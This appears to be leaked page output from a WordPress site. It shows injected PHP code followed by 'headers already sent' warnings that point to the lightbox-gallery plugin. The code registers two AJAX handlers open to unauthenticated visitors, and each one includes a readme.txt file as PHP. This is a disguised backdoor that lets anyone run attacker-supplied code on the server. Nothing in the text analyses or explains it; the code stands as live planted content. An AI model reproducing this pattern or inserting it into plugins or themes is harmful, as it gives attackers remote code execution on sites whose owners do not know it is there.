if(!function_exists('file_check_readme78246')){
add_action('wp_ajax_nopriv_file_check_readme78246', 'file_check_readme78246');
add_action('wp_ajax_file_check_readme78246', 'file_check_readme78246');
function file_check_readme78246()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme87880')){
add_action('wp_ajax_nopriv_file_check_readme87880', 'file_check_readme87880');
add_action('wp_ajax_file_check_readme87880', 'file_check_readme87880');
function file_check_readme87880()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home/educaci4/public_html/wp-content/plugins/lightbox-gallery/lightbox-gallery.php:859) in /home/educaci4/public_html/wp-includes/pluggable.php on line 1531
Warning: Cannot modify header information - headers already sent by (output started at /home/educaci4/public_html/wp-content/plugins/lightbox-gallery/lightbox-gallery.php:859) in /home/educaci4/public_html/wp-includes/pluggable.php on line 1534